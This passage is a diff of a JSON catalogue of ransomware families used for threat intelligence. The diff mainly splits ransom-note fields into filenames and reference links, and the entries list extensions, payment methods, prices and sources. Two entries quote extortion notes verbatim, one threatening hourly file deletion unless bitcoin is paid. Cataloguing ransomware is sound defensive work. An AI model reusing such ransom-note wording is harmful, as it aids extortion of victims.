"https://1.bp.blogspot.com/-7KRVg6kt418/WJnwxDOV5NI/AAAAAAAADrk/or9DbPMl-7ksN7OwIAH6BMJwE5fGc_BfgCLcB/s1600/note_2.png" ], "refs": [ @@ -1748,7 +1822,7 @@ ".cancer" ], "payment-method": "no ransom", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-ozPs6mwKfEI/WJjTwbrOx9I/AAAAAAAADqE/4gewG-f_dLQQDevajtn8CnX69lvWgCZQACLcB/s1600/wallp.jpg" ], "refs": [ @@ -1768,7 +1842,7 @@ ".locked" ], "payment-method": "Email - Bitcoin", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-BOmKmroIvEI/WJn-LAUmyyI/AAAAAAAADsI/W987TEaOnEAd45AOxO1cFyFvxEx_RfehgCLcB/s1600/note_2.png" ], "refs": [ @@ -1789,7 +1863,7 @@ ], "payment-method": "Bitcoin", "price": "10", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-dLSbqOiIbLU/WHPh-akYinI/AAAAAAAADC0/6nFQClDBJ5M7ZhrjkhnxfkdboOh7SlE-ACLcB/s1600/v5YZMxt.jpg" ], "refs": [ @@ -1809,9 +1883,11 @@ ".evillock" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_TO_DECRYPT_YOUR_FILES.TXT", - "HOW_TO_DECRYPT_YOUR_FILES.HTML", + "HOW_TO_DECRYPT_YOUR_FILES.HTML" + ], + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-0NFy_yDghZ0/WHO_ClbPdMI/AAAAAAAADCQ/RX2cgYg3z381gro6UUQtAED7JgXHbvGLgCLcB/s1600/note-txt_2.png", "https://4.bp.blogspot.com/-xxJ9xdRuWis/WHO_FL-hWcI/AAAAAAAADCU/VqI02AhzopQY1WKk-k6QYSdHFWFzg1NcACLcB/s1600/note_2.png" ], @@ -1835,7 +1911,7 @@ "date": "January 2017", "payment-method": "Bitcoin", "price": "0.03", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-3iMAtqvAmts/WHEyA_dW5OI/AAAAAAAADAY/tE5FtaVMJcc3aQQvWI4XOdjtvbXufFgywCLcB/s1600/lock1.jpg", "https://3.bp.blogspot.com/-DMxJm5GT0VY/WHEyEOi_vZI/AAAAAAAADAc/6Zi3IBuBz1I7jdQHcSrzhUGagGCUfs6iACLcB/s1600/lock2.jpg" ], @@ -1857,8 +1933,10 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "1000 CZK", - "ransomnotes": [ - "INFOK1.txt", + "ransomnotes-filenames": [ + "INFOK1.txt" + ], + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-i4ksJq-UzX8/WHFFXQL5wAI/AAAAAAAADA8/awfsqj1lr7IMBAPtE0tB44PNf1N6zkGDwCLcB/s1600/note_2.png", "https://1.bp.blogspot.com/-OlKgHvtAUHg/WHFDCx4thaI/AAAAAAAADAw/wzBXV17Xh-saaFGlrxw3CDNhGSTaVe2dQCLcB/s1600/lock1.jpg" ], @@ -1883,10 +1961,12 @@ ], "payment-method": "Bitcoin", "price": "155$", - "ransomnotes": [ - "https://2.bp.blogspot.com/-BclLp7x1sUM/WG6acqtDBbI/AAAAAAAAC_I/ToVEXx-G2DcKD4d7TZ0RkVqA1wRicxnZQCLcB/s1600/note_2.png", + "ransomnotes-filenames": [ "READ_ME.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-BclLp7x1sUM/WG6acqtDBbI/AAAAAAAAC_I/ToVEXx-G2DcKD4d7TZ0RkVqA1wRicxnZQCLcB/s1600/note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/mafiaware.html", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-6th-2017-fsociety-mongodb-pseudo-darkleech-and-more/", @@ -1920,8 +2000,10 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ - "How To Recover Encrypted Files.hta", + "ransomnotes-filenames": [ + "How To Recover Encrypted Files.hta" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-Wk1_IdcEHbk/WG6FVnoaKlI/AAAAAAAAC-4/WeHzJAUJ0goxxuAoGUUebSgzGHrnD6LQQCLcB/s1600/Globe-ransom-note_2.png.png", "https://3.bp.blogspot.com/-lYkopoRH0wQ/WHOt1KhhzhI/AAAAAAAADCA/nPdhHK3wEucAK1GHodeh5w3HcpdugzSHwCLcB/s1600/globe3-9-1-17.png" ], @@ -1958,7 +2040,7 @@ ], "payment-method": "Bitcoin", "price": "500$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-np8abNpYeoU/WG1KX4_H0yI/AAAAAAAAC98/gxRJeDb01So5yTboXYP7sZWurJFBbWziACLcB/s1600/note-html.jpg" ], "refs": [ @@ -1981,9 +2063,11 @@ ".BTC" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "BTC_DECRYPT_FILES.txt", - "BTC_DECRYPT_FILES.html", + "BTC_DECRYPT_FILES.html" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-uiHluU553MU/WGzoFpEWkfI/AAAAAAAAC9o/M34ndwHUsoEfZiLJv9j4PCgBImS8oyYaACLcB/s1600/note_2.png" ], "refs": [ @@ -2005,7 +2089,7 @@ ], "payment-method": "Bitcoin", "price": "700$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-hMAakgAORvg/WG_i-lk09II/AAAAAAAADAI/Uq2iCHC5ngYzeVcuxQF0mcbrLqyOGcA_wCLcB/s1600/note.png" ], "refs": [ @@ -2024,8 +2108,10 @@ ".LOCKED" ], "payment-method": "Bitcoin - WebSite (onion)", - "ransomnotes": [ - "DecryptFile.txt", + "ransomnotes-filenames": [ + "DecryptFile.txt" + ], + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-cAnilnXjK7k/WG_OHhC_UdI/AAAAAAAAC_4/sdbzTx9hP4sryM7xE59ONdk7Zr8D_m6XwCLcB/s1600/note-txt_2.png", "https://1.bp.blogspot.com/-TDK91s7FmNM/WGpcwq5HmwI/AAAAAAAAC8Q/i0Q66vE7m-0kmrKPXWdwnYQg6Eaw2KSDwCLcB/s1600/note-pay_2.png" ], @@ -2047,7 +2133,7 @@ ], "payment-method": "Bitcoin", "price": "0.1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-dNBgohC1UYg/WGnXhem546I/AAAAAAAAC7w/Wv0Jy4173xsBJDZPLMxe6lXBgI5BkY4BgCLcB/s1600/note-lock.jpg" ], "refs": [ @@ -2067,8 +2153,10 @@ ".locked" ], "payment-method": "Website", - "ransomnotes": [ - "MESSAGE.txt", + "ransomnotes-filenames": [ + "MESSAGE.txt" + ], + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-tDS74fDwB1Q/WGk2D5DcUYI/AAAAAAAAC6s/vahju5JD9B4chwnNDUvDPp4ejZOxnj_awCLcB/s1600/note-wallp.jpg" ], "refs": [ @@ -2098,7 +2186,7 @@ ], "payment-method": "Bitcoin", "price": "1.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-T0PhVuoFSyA/WGk5mYkRFAI/AAAAAAAAC64/j14Pt84YUmQMNa_5LSEn6fZ5CoYqz60swCLcB/s1600/note-lock.jpg" ], "refs": [ @@ -2114,10 +2202,12 @@ "date": "January 2017", "encryption": "Twofish", "payment-method": "Email", - "ransomnotes": [ - "https://4.bp.blogspot.com/-XZNMg5P75r4/WI985j-EKHI/AAAAAAAADcw/jGdtXoq2pnwjlAbFAJia4UsXuJrV5AU3gCLcB/s1600/note.jpg", + "ransomnotes-filenames": [ "Xhelp.jpg" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-XZNMg5P75r4/WI985j-EKHI/AAAAAAAADcw/jGdtXoq2pnwjlAbFAJia4UsXuJrV5AU3gCLcB/s1600/note.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/xcrypt-ransomware.html", "https://twitter.com/JakubKroustek/status/825790584971472902" @@ -2135,7 +2225,7 @@ ".7zipper" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-BR0DvtIft7g/WI95IF7IdUI/AAAAAAAADck/gzWAMbpFvaYicHFuMzvlM3YGJpgulMQBQCLcB/s1600/note_2.png" ], "refs": [ @@ -2157,7 +2247,7 @@ ], "payment-method": "Bitcoin", "price": "170€/$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-SF4RsOANlI0/WJBQd4SJv6I/AAAAAAAADdY/hI-Ncw9FoFMi5jvljUftpzTgdykOfR3vgCLcB/s1600/lock-wallp_2.png.png" ], "refs": [ @@ -2177,7 +2267,7 @@ "encryption": "AES-256 (fake)", "payment-method": "Bitcoin", "price": "50£", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-zShnOIf3R_E/WJBfhC4CdSI/AAAAAAAADdo/6l4hwSOmI0Evj4W0Esj1S_uNOy5Yq6X0QCLcB/s1600/note1-2-3.gif" ], "refs": [ @@ -2198,7 +2288,7 @@ ], "payment-method": "Bitcoin", "price": "0.18 (100$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-vODt2aB9Hck/WJCFc3g5eCI/AAAAAAAADe8/OrEVkqUHMU4swRWedoZuBu50AWoKR1FGACLcB/s1600/netflix-note.jpg", "https://4.bp.blogspot.com/-Cw4e1drBKl4/WJCHmgp1vtI/AAAAAAAADfI/QqFxUsuad" ], @@ -2227,9 +2317,11 @@ ".MERRY" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES_ARE_DEAD.HTA", - "MERRY_I_LOVE_YOU_BRUCE.HTA", + "MERRY_I_LOVE_YOU_BRUCE.HTA" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-3F3QAZnDxsI/WGpvD4wZ2OI/AAAAAAAAC80/-2L6dIPqsgs8hZHOX0T6AFf5LwPwfZ-rwCLcB/s1600/note.png", "https://4.bp.blogspot.com/-_w8peyLMcww/WHNJ1Gb0qeI/AAAAAAAADBw/EVbR-gKipYoNujo-YF6VavafsUfWDANEQCLcB/s1600/8-1-17.png" ], @@ -2272,7 +2364,7 @@ "encryption": "AES-256+RSA", "payment-method": "Bitcoin", "price": "222 (200 000$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-8MqANWraAgE/WGT7mj-XirI/AAAAAAAAC3g/H_f1hTxa7Sc_DEtllBe-vYaAfY-YqMelgCLcB/s1600/wallp.png" ], "refs": [ @@ -2298,10 +2390,12 @@ ], "payment-method": "Bitcoin", "price": "20 - 30$", - "ransomnotes": [ - "https://3.bp.blogspot.com/-9vg_tRPq8rQ/WGOjf4ULuGI/AAAAAAAACzw/d16uRmEOotsCbRM4hwvzQ6bB8xAVNJ7ogCLcB/s1600/DeriaLock.gif", + "ransomnotes-filenames": [ "unlock-everybody.txt" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-9vg_tRPq8rQ/WGOjf4ULuGI/AAAAAAAACzw/d16uRmEOotsCbRM4hwvzQ6bB8xAVNJ7ogCLcB/s1600/DeriaLock.gif" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/derialock-ransomware.html", "https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/" @@ -2319,10 +2413,12 @@ ".bript" ], "payment-method": "Email - Bitcoin", - "ransomnotes": [ - "https://3.bp.blogspot.com/-hApL-ObdWsk/WGAYUyCzPcI/AAAAAAAACyg/NuL26zNgRGcLnnF2BwgOEn3AYMgVu3gQACLcB/s1600/More-note.png", + "ransomnotes-filenames": [ "More.html" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-hApL-ObdWsk/WGAYUyCzPcI/AAAAAAAACyg/NuL26zNgRGcLnnF2BwgOEn3AYMgVu3gQACLcB/s1600/More-note.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/badencript-ransomware.html", "https://twitter.com/demonslay335/status/813064189719805952" @@ -2340,7 +2436,7 @@ ".adam" ], "payment-method": "Website", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-9IgXt6L0hLY/WGARdzJgfvI/AAAAAAAACyQ/1bfnX_We65AirDcAFpiG49NPuBMfGH9wwCLcB/s1600/note-adam.jpg" ], "refs": [ @@ -2360,7 +2456,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-bFPI3O1BI3s/WGPpvnDvNNI/AAAAAAAAC10/mLUiFOCWnEkjbV91PmUGnc3qsFMv9um8QCLcB/s1600/wallp.jpg" ], "refs": [ @@ -2390,7 +2486,7 @@ ], "payment-method": "Bitcoin", "price": "0.1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-NiQ6rSIprB8/WF-uxTMq6hI/AAAAAAAACyA/tA6qO3aJdGc0Dn_I-IOZOM3IwN5rgq9sACLcB/s1600/note-koko.jpg" ], "refs": [ @@ -2414,8 +2510,10 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ - "YOU_HAVE_BEEN_HACKED.txt", + "ransomnotes-filenames": [ + "YOU_HAVE_BEEN_HACKED.txt" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-yncl7-Jy198/WGDjdgNKXjI/AAAAAAAACzA/bfkDgwWEGKggUG3E1tgPBAWDXwi-p-7AwCLcB/s1600/note_2.png" ], "refs": [ @@ -2432,7 +2530,7 @@ "encryption": "AES-256+RSA", "payment-method": "Bitcoin", "price": "0.6 - 1.6", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-T9Mt0pE7kwY/WF7NKAPfv1I/AAAAAAAACxw/gOjxeSR0x7EurKQTI2p6Ym70ViYuYdsvQCLcB/s1600/note_2.png" ], "refs": [ @@ -2455,7 +2553,7 @@ ], "payment-method": "Bitcoin", "price": "0.4", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-0-kDVCM-kuI/WGVH-d2trGI/AAAAAAAAC4A/4LlxFpwkhEk89QcJ5ZhO1i-T6dQ_RcVegCEw/s1600/guster-note-2.jpg" ], "refs": [ @@ -2475,7 +2573,7 @@ ".madebyadam" ], "payment-method": "Website (gift card)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-ZIWywQMf2mY/WGJD-rqLZYI/AAAAAAAACzQ/p5PWlpWyHjcVHKq74DOsE7yS-ornW48_QCLcB/s1600/note.jpg" ], "refs": [ @@ -2504,7 +2602,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-LDSJ7rws1WI/WGDR-oDSshI/AAAAAAAACyw/_Kn0mnjpm2YN5tS9YldEnca-zOLJpXjcACLcB/s1600/crypto1-2.gif" ], "refs": [ @@ -2527,7 +2625,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-TkMikT4PA3o/WFrb4it2u9I/AAAAAAAACww/_zZgu9EHBj8Ibar8i5ekwaowGBD8EoOygCLcB/s1600/note.jpg" ], "refs": [ @@ -2547,7 +2645,7 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "0.2 (160$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-85wiBKXIqro/WFrFOaNeSsI/AAAAAAAACwA/UyrPc2bKQCcznmtLTFkEfc6lEvhseyRYACLcB/s1600/lock1.jpg" ], "refs": [ @@ -2569,7 +2667,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-owEtII_eezA/WFmOp0ccjaI/AAAAAAAACvk/gjYcSeflS4AChm5cYO5c3EV4aSmzr14UwCLcB/s1600/enc100.gif" ], "refs": [ @@ -2604,7 +2702,7 @@ ".braincrypt" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-KrKO1vYs-1w/WFlw6bOfI_I/AAAAAAAACug/42w1VSl2GIoxRuA2SPKJr6xYp3c4OBnJQCLcB/s1600/note_2.png", "https://3.bp.blogspot.com/-8bxTSAADM7M/WFmBEu-eUXI/AAAAAAAACvU/xaQBufV5a-4GWEJhXj2VVLqXnTjQJYNrwCLcB/s1600/note-brain2.jpg" ], @@ -2622,10 +2720,12 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "0.2", - "ransomnotes": [ - "https://2.bp.blogspot.com/-R-lKbH_tLvs/WGPRa-hCtqI/AAAAAAAAC1Y/zgKYZmys_jciaYhtTUsVLen5IHX8_LyiACLcB/s1600/note_2.png", + "ransomnotes-filenames": [ "RESTORE_YOUR_FILES.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-R-lKbH_tLvs/WGPRa-hCtqI/AAAAAAAAC1Y/zgKYZmys_jciaYhtTUsVLen5IHX8_LyiACLcB/s1600/note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/msn-cryptolocker-ransomware.html", "https://twitter.com/struppigel/status/810766686005719040" @@ -2641,7 +2741,7 @@ "encryption": "RSA-2048", "payment-method": "Bitcoin", "price": "0.3", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-4Y7GZEsWh7A/WFfnmQFF7nI/AAAAAAAACsQ/j3rXZmWrDxMM6xhV1s4YVl_WLDe28cpAwCLcB/s1600/001.jpg" ], "refs": [ @@ -2661,8 +2761,10 @@ ".aes256" ], "payment-method": "Email", - "ransomnotes": [ - "!!! READ THIS -IMPORTANT !!!.txt", + "ransomnotes-filenames": [ + "!!! READ THIS -IMPORTANT !!!.txt" + ], + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-GdF-kk1j9-8/WFl6NVm3PAI/AAAAAAAACvE/guFIi_FUpgIQNzX-usJ8CpofX45eXPvkQCLcB/s1600/note_2.png" ], "refs": [ @@ -2681,7 +2783,7 @@ ".encrypted" ], "payment-method": "Game", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-kz7PePfAiLI/WGTpY3us5LI/AAAAAAAAC3A/wu1rkx-BWlMzglJXXmCxeuYzbZKN5FP4gCLcB/s1600/koolova-v2.png" ], "refs": [ @@ -2703,10 +2805,12 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ - "https://1.bp.blogspot.com/-F8oAU82KnQ4/WFWgxjZz2vI/AAAAAAAACrI/J76wm21b5K4F9sjLF1VcEGoif3cS-Y-bwCLcB/s1600/note.jpg", + "ransomnotes-filenames": [ "HOW_OPEN_FILES.hta" ], + "ransomnotes-refs": [ + "https://1.bp.blogspot.com/-F8oAU82KnQ4/WFWgxjZz2vI/AAAAAAAACrI/J76wm21b5K4F9sjLF1VcEGoif3cS-Y-bwCLcB/s1600/note.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/fake-globe-ransomware.html", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-30th-2016-infected-tvs-and-open-source-ransomware-sucks/", @@ -2742,7 +2846,7 @@ ".v8" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-Acmbpw6fEaQ/WFUFKU9V9ZI/AAAAAAAACqc/47AceoWZzOwP9qO8uenjNVOVXeFJf7DywCLcB/s1600/note_2.png" ], "refs": [ @@ -2761,7 +2865,7 @@ ".ENC" ], "payment-method": "Website", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-I0fsQu2YXMI/WFLb9LPdkFI/AAAAAAAACoY/xqRhgO1o98oruVDMC6rO4RxCk5MFDSTYgCLcB/s1600/lock.jpg" ], "refs": [ @@ -2780,7 +2884,7 @@ ".antihacker2017" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-k7iDPgj17Zo/WFKEfMvR4wI/AAAAAAAACn4/8irB4Tf1x_MjfTmWaAjuae6mFJbva6GcwCLcB/s1600/note.jpg" ], "refs": [ @@ -2796,7 +2900,7 @@ "date": "December 2016", "payment-method": "Dollars", "price": "100 - 250 - 500", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-6I7jtsp5Wi4/WFLqnfUvg5I/AAAAAAAACow/BCOv7etYxxwpIERR1Qs5fmJ2wKBx3sqmACLcB/s1600/screen-locker.png" ], "refs": [ @@ -2814,7 +2918,7 @@ "meta": { "date": "December 2016", "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-LY1A0aeA_c0/WFEduvkiNQI/AAAAAAAACjk/B2-nFQoExscMVvZqvCaf9R4z_C6-rSdvACLcB/s1600/note2.png.png" ], "refs": [ @@ -2835,11 +2939,13 @@ ], "payment-method": "Bitcoin", "price": "2", - "ransomnotes": [ - "https://3.bp.blogspot.com/-E4brsgJRDHA/WFBU7wPaYLI/AAAAAAAACjU/sLEkzMiWp5wuc8hpFbylC7lLVMhftCLGgCLcB/s1600/111m.png", - "https://2.bp.blogspot.com/-b5caw8XAvIQ/WFBUuOto40I/AAAAAAAACjQ/_yzwIU17BHw4Ke4E3wM_XBI1XfnAvGSZQCLcB/s1600/005.png", + "ransomnotes-filenames": [ "_HELP_YOUR_FILES.html" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-E4brsgJRDHA/WFBU7wPaYLI/AAAAAAAACjU/sLEkzMiWp5wuc8hpFbylC7lLVMhftCLGgCLcB/s1600/111m.png", + "https://2.bp.blogspot.com/-b5caw8XAvIQ/WFBUuOto40I/AAAAAAAACjQ/_yzwIU17BHw4Ke4E3wM_XBI1XfnAvGSZQCLcB/s1600/005.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/kraken-ransomware.html" ] @@ -2854,7 +2960,7 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "0.25", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-6iMtvGe3T58/WE8Ftx7zcUI/AAAAAAAACiE/2ISTxSYzgKEgnfQ7FSUWo3BiCeVLHH_uwCLcB/s1600/note.jpg" ], "refs": [ @@ -2874,10 +2980,12 @@ ], "payment-method": "Bitcoin", "price": "950 bresilian real ($)", - "ransomnotes": [ - "https://3.bp.blogspot.com/-MWEyG49z2Qk/WE78wLqCXPI/AAAAAAAAChw/SIlQSe_o_wMars2egfZ7VqKfWuan6ThwQCLcB/s1600/note1.jpg", + "ransomnotes-filenames": [ "!!!!!ATENÇÃO!!!!!.html" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-MWEyG49z2Qk/WE78wLqCXPI/AAAAAAAAChw/SIlQSe_o_wMars2egfZ7VqKfWuan6ThwQCLcB/s1600/note1.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/payday-ransomware.html", "https://twitter.com/BleepinComputer/status/808316635094380544" @@ -2910,7 +3018,9 @@ "payment-method": "Bitcoin", "price": "0.3", "ransomnotes": [ - "I want to play a game with you. Let me explain the rules. Your personal files are being deleted. Your photos, videos, documents, etc... But, don't worry! It will only happen if you don't comply. However I've already encrypted your personal files, so you cannot access therm. Every hour I select some of them to delete permanently, therefore I won't be able to access them, either. Are you familiar with the concept of exponential growth? Let me help you out. It starts out slowly then increases rapidly. During the first 24 hour you will only lose a few files, the second day a few hundred, the third day a few thousand, and so on. If you turn off your computer or try to close me, when i start the next time you will het 1000 files deleted as punishment. Yes you will want me to start next time, since I am the only one that is capable to decrypt your personal data for you. Now, let's start and enjoy our little game together! Send 0.3 bitcoins to this adress to unlock your Pc with your email adress Your can purchase bitcoins from localbitcoins", + "I want to play a game with you. Let me explain the rules. Your personal files are being deleted. Your photos, videos, documents, etc... But, don't worry! It will only happen if you don't comply. However I've already encrypted your personal files, so you cannot access therm. Every hour I select some of them to delete permanently, therefore I won't be able to access them, either. Are you familiar with the concept of exponential growth? Let me help you out. It starts out slowly then increases rapidly. During the first 24 hour you will only lose a few files, the second day a few hundred, the third day a few thousand, and so on. If you turn off your computer or try to close me, when i start the next time you will het 1000 files deleted as punishment. Yes you will want me to start next time, since I am the only one that is capable to decrypt your personal data for you. Now, let's start and enjoy our little game together! Send 0.3 bitcoins to this adress to unlock your Pc with your email adress Your can purchase bitcoins from localbitcoins" + ], + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-9MsC3A3tuUA/WFGZM45Pw5I/AAAAAAAACms/NbDFma30D9MpK2Zc0O6NvDizU8vqUWWlwCLcB/s1600/M4N1F3STO.jpg" ], "refs": [ @@ -2946,7 +3056,7 @@ ], "payment-method": "Bitcoin", "price": "1000 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-DOjKnuzCMo8/WE1Xd8yksiI/AAAAAAAACfo/d93v2xn857gQDg4o5Rd4oZpP3q-Ipv9xgCLcB/s1600/UltraLocker.png" ], "refs": [ @@ -2966,7 +3076,7 @@ ".pre_alpha" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-6NIoKnSTwcs/WExcV900C_I/AAAAAAAACfI/_Hba3mOwk3UQ0T5rGercOglMsCTjVtCnQCLcB/s1600/note2.png" ], "refs": [ @@ -2988,7 +3098,7 @@ ], "payment-method": "Bitcoin", "price": "0.5 - 1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-Lyd1uRKG-94/WFJ3TbNqWfI/AAAAAAAACnc/4LoazYU0S1s1YRz3Xck3LN1vOm5RwIpugCLcB/s1600/note.jpg", "https://4.bp.blogspot.com/-eBeh1lzEYsI/WFJ4l1oJ4fI/AAAAAAAACno/P5inceelNNk-zfkJGhE3XNamOGC8YmBwwCLcB/s1600/str123.gif" ], @@ -3008,7 +3118,7 @@ "_morf56@meta.ua_" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-Fh2I6542zi4/WEpmphY0i1I/AAAAAAAACe4/FBP3J6UraBMkSMTWx2tm-FRYnmlYLtFWgCLcB/s1600/note2.png.png" ], "refs": [ @@ -3029,12 +3139,14 @@ ], "payment-method": "Bitcoin", "price": "0.5 - 1", - "ransomnotes": [ - "https://3.bp.blogspot.com/-WxtRn5yVcNw/WEmgAPgO4AI/AAAAAAAACeo/M7iS6L8pSOEr8EUDkCK_g6h0aMKQQXfGwCLcB/s1600/note2.png", - "https://3.bp.blogspot.com/-sLwR-6y2M-I/WEmVIdJuPMI/AAAAAAAACeY/gpQDT-2-d7kkrfTHgiEZCfxViHu7dNE7ACLcB/s1600/med.jpg", + "ransomnotes-filenames": [ "restore_your_files.html", "restore_your_files.txt" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-WxtRn5yVcNw/WEmgAPgO4AI/AAAAAAAACeo/M7iS6L8pSOEr8EUDkCK_g6h0aMKQQXfGwCLcB/s1600/note2.png", + "https://3.bp.blogspot.com/-sLwR-6y2M-I/WEmVIdJuPMI/AAAAAAAACeY/gpQDT-2-d7kkrfTHgiEZCfxViHu7dNE7ACLcB/s1600/med.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/popcorntime-ransomware.html", "https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/" @@ -3053,7 +3165,7 @@ ], "payment-method": "Bitcoin", "price": "0.33 - 0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-G-xrI4N08hs/WFJjQgB3ojI/AAAAAAAACnM/DEfy_skSg044UmbBfNodiQY4OaLkkQPOwCLcB/s1600/note-hacked.jpg" ], "refs": [ @@ -3073,7 +3185,7 @@ ], "payment-method": "Bitcoin", "price": "1.33 - 1.34", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-qcJxWivTx1w/WEcEW14om5I/AAAAAAAACa4/xLAlsQGZjeg7Zlg3F2fQAcgQ_6b_cNQLACLcB/s1600/goldeneye-1.jpg", "https://4.bp.blogspot.com/-avE8liOWdPY/WEcEbdTxx6I/AAAAAAAACa8/KOKgXzU1h2EJ0tTOKMdQzZ_JdWWNeFMdwCLcB/s1600/goldeneye-1-2.jpg" ], @@ -3096,7 +3208,7 @@ ], "payment-method": "Bitcoin", "price": "0.74 (545 $)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-GasUzax8cco/WEar0U0tPqI/AAAAAAAACZw/6V_1JFxLMH0UnmLa3-WZa_ML9JbxF0JYACEw/s1600/note-txt2.png" ], "refs": [ @@ -3118,7 +3230,7 @@ ], "payment-method": "Bitcoin", "price": "4(1040 $)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-Lhq40sgYUpI/WEWpGkkWOKI/AAAAAAAACZQ/iOp9g9Ya0Fk9vZrNKwTEMVcEOzKFIwqgACLcB/s1600/english-2.png" ], "refs": [ @@ -3149,24 +3261,28 @@ ], "payment-method": "Email", "ransomnotes": [ - "https://4.bp.blogspot.com/-RGHgroHt5cU/WEUWnFBn2hI/AAAAAAAACYA/zwSf7rmfWdo4ESQ8kjwj6mJrfzL2V22mgCLcB/s1600/note-eng.png", + "WHAT HAPPENED WITH YOUR FILES?\nYour documents, databases, backups, network folders and other important files are encrypted with RSA-2048 and 